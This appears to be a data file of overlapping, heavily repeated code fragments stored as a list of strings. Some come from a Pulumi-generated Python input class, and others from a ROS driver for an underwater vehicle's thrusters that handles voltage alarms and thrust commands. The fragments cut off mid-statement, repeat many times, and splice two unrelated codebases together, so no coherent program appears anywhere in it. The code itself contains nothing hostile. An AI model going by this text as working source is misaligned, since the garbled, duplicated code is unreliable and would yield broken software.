"pulumi.Input[str], id: pulumi.Input[str], push_status: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, \"expression\", expression) pulumi.set(__self__, \"id\", id)",
"you are doing! *** import warnings import pulumi import pulumi.runtime from typing import",
"None): pulumi.set(__self__, \"expression\", expression) pulumi.set(__self__, \"id\", id) if push_status is not None: pulumi.set(__self__,",
"-> Optional[pulumi.Input[str]]: return pulumi.get(self, \"push_status\") @push_status.setter def push_status(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, \"push_status\", value)",
"= [ 'MappingMappingArgs', ] @pulumi.input_type class MappingMappingArgs: def __init__(__self__, *, expression: pulumi.Input[str], id:",
"*** # *** Do not edit by hand unless you're certain you know",
"by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit",
"Bridge (tfgen) Tool. *** # *** Do not edit by hand unless you're",
"from typing import Any, Dict, List, Mapping, Optional, Tuple, Union from .. import",
"push_status) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, \"expression\") @expression.setter def expression(self,",
"def id(self, value: pulumi.Input[str]): pulumi.set(self, \"id\", value) @property @pulumi.getter(name=\"pushStatus\") def push_status(self) -> Optional[pulumi.Input[str]]:",
"return pulumi.get(self, \"id\") @id.setter def id(self, value: pulumi.Input[str]): pulumi.set(self, \"id\", value) @property @pulumi.getter(name=\"pushStatus\")",
"import Any, Dict, List, Mapping, Optional, Tuple, Union from .. import _utilities, _tables",
"__all__ = [ 'MappingMappingArgs', ] @pulumi.input_type class MappingMappingArgs: def __init__(__self__, *, expression: pulumi.Input[str],",
"pulumi.get(self, \"id\") @id.setter def id(self, value: pulumi.Input[str]): pulumi.set(self, \"id\", value) @property @pulumi.getter(name=\"pushStatus\") def",
"@pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, \"expression\") @expression.setter def expression(self, value: pulumi.Input[str]):",
"Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand",
"pulumi.Input[str]: return pulumi.get(self, \"expression\") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, \"expression\", value) @property",
"not None: pulumi.set(__self__, \"push_status\", push_status) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self,",
"id) if push_status is not None: pulumi.set(__self__, \"push_status\", push_status) @property @pulumi.getter def expression(self)",
"\"push_status\", push_status) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, \"expression\") @expression.setter def",
"id: pulumi.Input[str], push_status: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, \"expression\", expression) pulumi.set(__self__, \"id\", id) if",
"# *** Do not edit by hand unless you're certain you know what",
"@id.setter def id(self, value: pulumi.Input[str]): pulumi.set(self, \"id\", value) @property @pulumi.getter(name=\"pushStatus\") def push_status(self) ->",
"None: pulumi.set(__self__, \"push_status\", push_status) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, \"expression\")",
"coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform Bridge",
"doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Dict,",
"\"id\") @id.setter def id(self, value: pulumi.Input[str]): pulumi.set(self, \"id\", value) @property @pulumi.getter(name=\"pushStatus\") def push_status(self)",
"def __init__(__self__, *, expression: pulumi.Input[str], id: pulumi.Input[str], push_status: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, \"expression\",",
"value) @property @pulumi.getter def id(self) -> pulumi.Input[str]: return pulumi.get(self, \"id\") @id.setter def id(self,",
"is not None: pulumi.set(__self__, \"push_status\", push_status) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return",
"*** Do not edit by hand unless you're certain you know what you",
"# coding=utf-8 # *** WARNING: this file was generated by the Pulumi Terraform",
"\"id\", value) @property @pulumi.getter(name=\"pushStatus\") def push_status(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, \"push_status\") @push_status.setter def",
"[ 'MappingMappingArgs', ] @pulumi.input_type class MappingMappingArgs: def __init__(__self__, *, expression: pulumi.Input[str], id: pulumi.Input[str],",
"warnings import pulumi import pulumi.runtime from typing import Any, Dict, List, Mapping, Optional,",
"certain you know what you are doing! *** import warnings import pulumi import",
"expression(self) -> pulumi.Input[str]: return pulumi.get(self, \"expression\") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, \"expression\",",
"value) @property @pulumi.getter(name=\"pushStatus\") def push_status(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, \"push_status\") @push_status.setter def push_status(self,",
"hand unless you're certain you know what you are doing! *** import warnings",
"(tfgen) Tool. *** # *** Do not edit by hand unless you're certain",
"push_status: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, \"expression\", expression) pulumi.set(__self__, \"id\", id) if push_status is",
"@property @pulumi.getter def id(self) -> pulumi.Input[str]: return pulumi.get(self, \"id\") @id.setter def id(self, value:",
"this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** #",
"from .. import _utilities, _tables __all__ = [ 'MappingMappingArgs', ] @pulumi.input_type class MappingMappingArgs:",
"id(self) -> pulumi.Input[str]: return pulumi.get(self, \"id\") @id.setter def id(self, value: pulumi.Input[str]): pulumi.set(self, \"id\",",
"pulumi.Input[str]): pulumi.set(self, \"expression\", value) @property @pulumi.getter def id(self) -> pulumi.Input[str]: return pulumi.get(self, \"id\")",
"# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen)",
"Tuple, Union from .. import _utilities, _tables __all__ = [ 'MappingMappingArgs', ] @pulumi.input_type",
"\"expression\") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, \"expression\", value) @property @pulumi.getter def id(self)",
"value: pulumi.Input[str]): pulumi.set(self, \"expression\", value) @property @pulumi.getter def id(self) -> pulumi.Input[str]: return pulumi.get(self,",
"_utilities, _tables __all__ = [ 'MappingMappingArgs', ] @pulumi.input_type class MappingMappingArgs: def __init__(__self__, *,",
"import _utilities, _tables __all__ = [ 'MappingMappingArgs', ] @pulumi.input_type class MappingMappingArgs: def __init__(__self__,",
"def push_status(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, \"push_status\") @push_status.setter def push_status(self, value: Optional[pulumi.Input[str]]): pulumi.set(self,",
"import pulumi import pulumi.runtime from typing import Any, Dict, List, Mapping, Optional, Tuple,",
"expression: pulumi.Input[str], id: pulumi.Input[str], push_status: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, \"expression\", expression) pulumi.set(__self__, \"id\",",
"Union from .. import _utilities, _tables __all__ = [ 'MappingMappingArgs', ] @pulumi.input_type class",
"def id(self) -> pulumi.Input[str]: return pulumi.get(self, \"id\") @id.setter def id(self, value: pulumi.Input[str]): pulumi.set(self,",
"Tool. *** # *** Do not edit by hand unless you're certain you",
"pulumi.set(self, \"expression\", value) @property @pulumi.getter def id(self) -> pulumi.Input[str]: return pulumi.get(self, \"id\") @id.setter",
"\"expression\", value) @property @pulumi.getter def id(self) -> pulumi.Input[str]: return pulumi.get(self, \"id\") @id.setter def",
"\"id\", id) if push_status is not None: pulumi.set(__self__, \"push_status\", push_status) @property @pulumi.getter def",
"what you are doing! *** import warnings import pulumi import pulumi.runtime from typing",
"pulumi.set(self, \"id\", value) @property @pulumi.getter(name=\"pushStatus\") def push_status(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, \"push_status\") @push_status.setter",
"-> pulumi.Input[str]: return pulumi.get(self, \"id\") @id.setter def id(self, value: pulumi.Input[str]): pulumi.set(self, \"id\", value)",
"List, Mapping, Optional, Tuple, Union from .. import _utilities, _tables __all__ = [",
"-> pulumi.Input[str]: return pulumi.get(self, \"expression\") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, \"expression\", value)",
"edit by hand unless you're certain you know what you are doing! ***",
"@property @pulumi.getter(name=\"pushStatus\") def push_status(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self, \"push_status\") @push_status.setter def push_status(self, value:",
"you know what you are doing! *** import warnings import pulumi import pulumi.runtime",
"pulumi.get(self, \"expression\") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, \"expression\", value) @property @pulumi.getter def",
"Optional, Tuple, Union from .. import _utilities, _tables __all__ = [ 'MappingMappingArgs', ]",
"value: pulumi.Input[str]): pulumi.set(self, \"id\", value) @property @pulumi.getter(name=\"pushStatus\") def push_status(self) -> Optional[pulumi.Input[str]]: return pulumi.get(self,",
"pulumi.set(__self__, \"push_status\", push_status) @property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, \"expression\") @expression.setter",
"if push_status is not None: pulumi.set(__self__, \"push_status\", push_status) @property @pulumi.getter def expression(self) ->",
"know what you are doing! *** import warnings import pulumi import pulumi.runtime from",
"id(self, value: pulumi.Input[str]): pulumi.set(self, \"id\", value) @property @pulumi.getter(name=\"pushStatus\") def push_status(self) -> Optional[pulumi.Input[str]]: return",
"class MappingMappingArgs: def __init__(__self__, *, expression: pulumi.Input[str], id: pulumi.Input[str], push_status: Optional[pulumi.Input[str]] = None):",
"pulumi.Input[str]: return pulumi.get(self, \"id\") @id.setter def id(self, value: pulumi.Input[str]): pulumi.set(self, \"id\", value) @property",
"def expression(self, value: pulumi.Input[str]): pulumi.set(self, \"expression\", value) @property @pulumi.getter def id(self) -> pulumi.Input[str]:",
"*** import warnings import pulumi import pulumi.runtime from typing import Any, Dict, List,",
"Optional[pulumi.Input[str]] = None): pulumi.set(__self__, \"expression\", expression) pulumi.set(__self__, \"id\", id) if push_status is not",
"@expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self, \"expression\", value) @property @pulumi.getter def id(self) ->",
"def expression(self) -> pulumi.Input[str]: return pulumi.get(self, \"expression\") @expression.setter def expression(self, value: pulumi.Input[str]): pulumi.set(self,",
"Terraform Bridge (tfgen) Tool. *** # *** Do not edit by hand unless",
"file was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # ***",
"pulumi.set(__self__, \"id\", id) if push_status is not None: pulumi.set(__self__, \"push_status\", push_status) @property @pulumi.getter",
"Dict, List, Mapping, Optional, Tuple, Union from .. import _utilities, _tables __all__ =",
"@pulumi.getter def id(self) -> pulumi.Input[str]: return pulumi.get(self, \"id\") @id.setter def id(self, value: pulumi.Input[str]):",
"'MappingMappingArgs', ] @pulumi.input_type class MappingMappingArgs: def __init__(__self__, *, expression: pulumi.Input[str], id: pulumi.Input[str], push_status:",
"push_status is not None: pulumi.set(__self__, \"push_status\", push_status) @property @pulumi.getter def expression(self) -> pulumi.Input[str]:",
"] @pulumi.input_type class MappingMappingArgs: def __init__(__self__, *, expression: pulumi.Input[str], id: pulumi.Input[str], push_status: Optional[pulumi.Input[str]]",
"pulumi import pulumi.runtime from typing import Any, Dict, List, Mapping, Optional, Tuple, Union",
"pulumi.Input[str], push_status: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, \"expression\", expression) pulumi.set(__self__, \"id\", id) if push_status",
"pulumi.set(__self__, \"expression\", expression) pulumi.set(__self__, \"id\", id) if push_status is not None: pulumi.set(__self__, \"push_status\",",
"was generated by the Pulumi Terraform Bridge (tfgen) Tool. *** # *** Do",
"import pulumi.runtime from typing import Any, Dict, List, Mapping, Optional, Tuple, Union from",
".. import _utilities, _tables __all__ = [ 'MappingMappingArgs', ] @pulumi.input_type class MappingMappingArgs: def",
"you're certain you know what you are doing! *** import warnings import pulumi",
"unless you're certain you know what you are doing! *** import warnings import",
"= None): pulumi.set(__self__, \"expression\", expression) pulumi.set(__self__, \"id\", id) if push_status is not None:",
"*, expression: pulumi.Input[str], id: pulumi.Input[str], push_status: Optional[pulumi.Input[str]] = None): pulumi.set(__self__, \"expression\", expression) pulumi.set(__self__,",
"@property @pulumi.getter def expression(self) -> pulumi.Input[str]: return pulumi.get(self, \"expression\") @expression.setter def expression(self, value:",
"@pulumi.input_type class MappingMappingArgs: def __init__(__self__, *, expression: pulumi.Input[str], id: pulumi.Input[str], push_status: Optional[pulumi.Input[str]] ="
] |
[
"from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm import thruster_comm_factory from ros_alarms",
"offline_on_port and failed not in self.deactivated_thrusters): self.failed_thrusters.remove(failed) # Thruster came online # Don't",
"self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now() self.WINDOW_DURATION =",
"message_contents = [ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg' ] message_keyword_args",
"self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers = {name: rospy.Publisher('thrusters/status/' + name, ThrusterStatus, queue_size=10)",
"self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server",
"# Only add if it makes sense (the M5's will give nonsense feedback",
"if a thrust value outside of the configured thrust bounds is commanded Raises",
"copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and failed not in offline_on_port and failed not",
"receiving thrust commands These messages contain a list of instructions, one for each",
"to the appropriate port/thruster - Send a thruster status message describing the status",
"import Thrust, ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo,",
"return np.mean(voltages) def check_bus_voltage(self): ''' Publishes bus_voltage estimate and raises alarm if necessary",
"''' self.ports = {} # ThrusterPort objects self.thruster_to_port_map = {} # node_id to",
"Keep track of thrusters going online or offline offline_on_port = target_port.get_offline_thruster_names() for offline",
"Sub8's VideoRay M5 thrusters\" desc_msg = \"Specify a path to the configuration.json file",
"going online or offline offline_on_port = target_port.get_offline_thruster_names() for offline in offline_on_port: if offline",
"Don't try to do anything if the thruster status is bad if thruster_status",
"not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline for failed in copy.deepcopy(self.failed_thrusters): if",
"to command thrust ({}) outside of physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if",
"import Header, Float64 from sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock,",
"severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust):",
"times) if voltage >= self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() #",
"is needed ''' VMAX = 50 # volts VMIN = 0 # volts",
"rospy.Time.now() self.WINDOW_DURATION = rospy.Duration(window_duration) self.ESTIMATION_PERIOD = rospy.Duration(0.2) self.cached_severity = 0 self.buffer = []",
"self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): ''' Loads",
"If someone else cleared this alarm, we need to make sure to raise",
"queue_size=1) # To programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster) self.unfail_thruster_server =",
"= set() # These will not come back online even if comms are",
"= target_port.get_offline_thruster_names() for offline in offline_on_port: if offline not in self.failed_thrusters: self.failed_thrusters.add(offline) #",
"online even if comms are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the",
"the thruster dict and configure if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] =",
"if enough time has passed if rospy.Time.now() - self.last_estimate_time > self.ESTIMATION_PERIOD: self.check_bus_voltage() def",
"\"Interface to Sub8's VideoRay M5 thrusters\" desc_msg = \"Specify a path to the",
"self.failed_thrusters.add(offline) # Thruster went offline for failed in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names()",
"parameters={'offline_thruster_names': offline_names}) @thread_lock(lock) def command_thruster(self, name, thrust): ''' Issue a a force command",
"FailThruster, self.fail_thruster) self.unfail_thruster_server = rospy.Service('unfail_thruster', UnfailThruster, self.unfail_thruster) @thread_lock(lock) def load_thruster_ports(self, ports_layout, thruster_definitions): '''",
"self.get_voltage_estimate() if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage)) severity = None if bus_voltage <",
"Newtons) to a named thruster Example names are BLR, FLH, etc. Raises RuntimeError",
"# Raise or clear 'thruster-out' alarm if not self.failed_thrusters == failed_before: rospy.logdebug('Failed thrusters:',",
"for r in self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): ''' Publishes bus_voltage estimate",
"from buffer ''' for reading in self.buffer: age = rospy.Time.now() - reading.t if",
"of the sub's thrusters - Gather configuration data and make it available to",
"thruster_model.thrust_bounds)) if name in self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust",
"* thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name, node_id=thruster_model.node_id, power=power, effort=effort, thrust=thrust, **message_keyword_args ) )",
"time): ''' Adds voltage readings to buffer ''' voltage = float(voltage) # Only",
"_window_duration = 30.0 # s _NODE_NAME = rospy.get_name() def __init__(self, ports_layout, thruster_definitions): '''Thruster",
"Thruster went offline for failed in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and failed",
"if voltage >= self.VMIN and voltage <= self.VMAX: self.buffer.append(self.VoltageReading(voltage, time)) self.prune_buffer() # check",
"things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command",
"severity = 5 if severity is not None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm(",
"the list of failed thrusters, it will raise and alarm ''' failed_before =",
"import wait_for_param, thread_lock, numpy_to_point from sub8_msgs.srv import ThrusterInfo, ThrusterInfoResponse, FailThruster, UnfailThruster from sub8_thruster_comm",
"offline_on_port: if offline not in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline for failed",
"alarm if necessary ''' bus_voltage = self.get_voltage_estimate() if bus_voltage is None: return self.bus_voltage_pub.publish(Float64(bus_voltage))",
"thruster unavailable for thrust allocation ''' # So that thrust is not allocated",
"message describing the status of the particular thruster ''' self.failed_thrusters = set() #",
"5): 'STALL_WARN', } fault = int(message_keyword_args['fault']) faults = [] for code, fault_name in",
"class ThrusterDriver(object): _dropped_timeout = 1.0 # s _window_duration = 30.0 # s _NODE_NAME",
"self.make_fake = rospy.get_param('simulate', False) if self.make_fake: rospy.logwarn(\"Running fake thrusters for simulation, based on",
"''' offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters),",
"estimates sub8's thruster bus voltage. As of May 2017, this is just a",
"self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust',",
"rospy import rospkg import rosparam import threading import argparse from geometry_msgs.msg import Vector3",
"'STALL', (1 << 5): 'STALL_WARN', } fault = int(message_keyword_args['fault']) faults = [] for",
"voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): ''' Publishes bus_voltage estimate and raises alarm if",
"== failed_before: rospy.logdebug('Failed thrusters:', self.failed_thrusters) self.update_thruster_out_alarm() def stop(self): ''' Commands 0 thrust to",
"''' VMAX = 50 # volts VMIN = 0 # volts class VoltageReading(object):",
"def unfail_thruster(self, srv): ''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return",
"''' Removes readings older than the window_duration from buffer ''' for reading in",
"self.thruster_to_port_map[name] target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or thrust",
"offline for failed in copy.deepcopy(self.failed_thrusters): if (failed in target_port.get_declared_thruster_names() and failed not in",
"rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def thrust_cb(self, msg): ''' Callback for receiving thrust",
"not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set",
"({}) outside of physical thrust bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters:",
"self.failed_thrusters = set() # This is only determined by comms self.deactivated_thrusters = set()",
"port_info['port'] self.ports[port_name] = thruster_comm_factory(port_info, thruster_definitions, fake=self.make_fake) # Add the thrusters to the thruster",
"in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64, queue_size=1) self.warn_voltage",
"None for r in self.buffer: voltages.append(r.v) return np.mean(voltages) def check_bus_voltage(self): ''' Publishes bus_voltage",
"Float64 from sub8_msgs.msg import Thrust, ThrusterStatus from mil_ros_tools import wait_for_param, thread_lock, numpy_to_point from",
"name in self.thruster_to_port_map.keys()} # These alarms require this service to be available before",
"voltage has fallen to {}'.format(bus_voltage), parameters={'bus_voltage': bus_voltage}, severity=severity ) self.cached_severity = severity class",
"volts class VoltageReading(object): def __init__(self, voltage, time): self.v = voltage self.t = time",
"target_port = self.ports[port_name] thruster_model = target_port.thruster_info[name] if thrust < thruster_model.thrust_bounds[0] or thrust >",
"buffer ''' for reading in self.buffer: age = rospy.Time.now() - reading.t if age",
"= 5 if severity is not None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus",
"not None and self.cached_severity != severity: self.bus_voltage_alarm.raise_alarm( problem_description='Bus voltage has fallen to {}'.format(bus_voltage),",
"bounds ({})'.format( thrust, thruster_model.thrust_bounds)) if name in self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver:",
"left for when smarter filtering is needed ''' VMAX = 50 # volts",
"None: return message_contents = [ 'rpm', 'bus_v', 'bus_i', 'temp', 'fault', 'command_tx_count', 'status_rx_count', 'command_latency_avg'",
"width sliding window. However add_reading and get_estimate methods are left for when smarter",
"alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might not still",
"in self.ports.values(): for thruster_name in port.online_thruster_names.copy(): self.command_thruster(thruster_name, 0.0) def fail_thruster(self, srv): ''' Makes",
"np.mean(voltages) def check_bus_voltage(self): ''' Publishes bus_voltage estimate and raises alarm if necessary '''",
"# Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference #",
"self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name not in self.ports[port_name].online_thruster_names: rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else:",
"raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) # Undervolt/overvolt faults are unreliable (might not",
"rospy.logerr(\"ThrusterDriver: {} IS MISSING!\".format(thruster_name)) else: rospy.loginfo(\"ThrusterDriver: {} registered\".format(thruster_name)) # Set firmware settings port",
"self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage in buffer ''' voltages =",
"rospkg import rosparam import threading import argparse from geometry_msgs.msg import Vector3 from std_msgs.msg",
"will give nonsense feedback at times) if voltage >= self.VMIN and voltage <=",
"offline_names = list(self.failed_thrusters) if len(self.failed_thrusters) > 0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1,",
"0: self.thruster_out_alarm.raise_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names}, severity=int(np.clip(len(self.failed_thrusters), 1, 5))) else: self.thruster_out_alarm.clear_alarm( node_name=self._NODE_NAME, parameters={'offline_thruster_names': offline_names})",
"in fault_codes.items(): if code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered",
"are good self.deactivated_thrusters.add(srv.thruster_name) # So that thruster_mapper updates the B-matrix self.update_thruster_out_alarm() return {}",
"x in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear",
"age > self.WINDOW_DURATION: self.buffer.remove(reading) def get_voltage_estimate(self): ''' Returns average voltage in buffer '''",
"if thrust < thruster_model.thrust_bounds[0] or thrust > thruster_model.thrust_bounds[1]: rospy.logwarn('Tried to command thrust ({})",
"in self.failed_thrusters: self.failed_thrusters.add(offline) # Thruster went offline for failed in copy.deepcopy(self.failed_thrusters): if (failed",
"AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent outside interference # Create ThrusterPort objects in a",
"''' query_name = srv.thruster_name info = self.ports[self.thruster_to_port_map[query_name]].thruster_info[query_name] thruster_info = ThrusterInfoResponse( node_id=info.node_id, min_force=info.thrust_bounds[0], max_force=info.thrust_bounds[1],",
"= 1.0 # s _window_duration = 30.0 # s _NODE_NAME = rospy.get_name() def",
"effect def get_thruster_info(self, srv): ''' Get the thruster info for a particular thruster",
"= BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To",
"for simulation, based on parameter '/simulate'\") # Instantiate thruster comms port for port_info",
"good (user managed) # Alarms self.thruster_out_alarm = AlarmBroadcaster(\"thruster-out\") AlarmListener(\"thruster-out\", self.check_alarm_status, call_when_raised=False) # Prevent",
"the configured thrust bounds is commanded Raises UnavailableThrusterException if a thruster that is",
"available before things will work rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration)",
"clears the thruster out alarm Updates the 'offline_thruster_names' parameter accordingly Sets the severity",
"<< 3): 'OVERTEMP', (1 << 4): 'STALL', (1 << 5): 'STALL_WARN', } fault",
"srv): ''' Undoes effect of self.fail_thruster ''' self.failed_thrusters.remove(srv.thruster_name) self.deactivated_thrusters.remove(srv.thruster_name) self.update_thruster_out_alarm() return {} if",
"desc_msg = \"Specify a path to the configuration.json file containing the thrust calibration",
"& fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with status {}\".format(name,",
"it makes sense (the M5's will give nonsense feedback at times) if voltage",
"data\" parser = argparse.ArgumentParser(usage=usage_msg, description=desc_msg) args = parser.parse_args(rospy.myargv()[1:]) rospy.init_node('videoray_m5_thruster_driver') layout_parameter = '/thruster_layout' rospy.loginfo(\"Thruster",
"rospy.wait_for_service(\"update_thruster_layout\") self.update_thruster_out_alarm() # Bus voltage self.bus_voltage_monitor = BusVoltageMonitor(self._window_duration) # Command thrusters self.thrust_sub =",
"self.thrust_sub = rospy.Subscriber('thrusters/thrust', Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters self.fail_thruster_server =",
"So that it won't come back online even if comms are good self.deactivated_thrusters.add(srv.thruster_name)",
"in self.failed_thrusters: if not np.isclose(thrust, 0): rospy.logwarn('ThrusterDriver: commanding non-zero thrust to offline thruster",
"for key in message_contents} power = thruster_status['bus_v'] * thruster_status['bus_i'] self.status_publishers[name].publish( ThrusterStatus( header=Header(stamp=rospy.Time.now()), name=name,",
"thruster Example names are BLR, FLH, etc. Raises RuntimeError if a thrust value",
"to the list of failed thrusters, it will raise and alarm ''' failed_before",
"''' Adds voltage readings to buffer ''' voltage = float(voltage) # Only add",
"thrust commands These messages contain a list of instructions, one for each thruster",
"self.kill_voltage: severity = 5 if severity is not None and self.cached_severity != severity:",
"< self.kill_voltage: severity = 5 if severity is not None and self.cached_severity !=",
"in self.failed_thrusters} for thrust_cmd in list(msg.thruster_commands): self.command_thruster(thrust_cmd.name, thrust_cmd.thrust) # Raise or clear 'thruster-out'",
"readings older than the window_duration from buffer ''' for reading in self.buffer: age",
"and configure if present for thruster_name in port_info['thruster_names']: self.thruster_to_port_map[thruster_name] = port_info['port'] if thruster_name",
"Float64, queue_size=1) self.warn_voltage = rospy.get_param(\"/battery/warn_voltage\", 44.5) self.kill_voltage = rospy.get_param(\"/battery/kill_voltage\", 44.0) self.last_estimate_time = rospy.Time.now()",
"command_thruster(self, name, thrust): ''' Issue a a force command (in Newtons) to a",
"code & fault != 0: faults.append(fault_name) rospy.logwarn(\"Thruster: {} has entered fault with status",
"a reading in the buffer) ''' self.bus_voltage_alarm = AlarmBroadcaster(\"bus-voltage\") self.bus_voltage_pub = rospy.Publisher('bus_voltage', Float64,",
"fault with status {}\".format(name, message_keyword_args)) rospy.logwarn(\"Fault causes are: {}\".format(faults)) return def thrust_cb(self, msg):",
"be true - David) if message_keyword_args['fault'] > 2: fault_codes = { (1 <<",
") # Will publish bus_voltage and raise alarm if necessary self.bus_voltage_monitor.add_reading(message_keyword_args['bus_v'], rospy.Time.now()) #",
"{} registered\".format(thruster_name)) # Set firmware settings port = self.ports[port_name] node_id = thruster_definitions[thruster_name]['node_id'] config_path",
"objects in a dict indexed by port name self.load_thruster_ports(ports_layout, thruster_definitions) # Feedback on",
"blocks until it can use this service) self.thruster_info_service = rospy.Service('thrusters/thruster_info', ThrusterInfo, self.get_thruster_info) self.status_publishers",
"Thrust, self.thrust_cb, queue_size=1) # To programmatically deactivate thrusters self.fail_thruster_server = rospy.Service('fail_thruster', FailThruster, self.fail_thruster)",
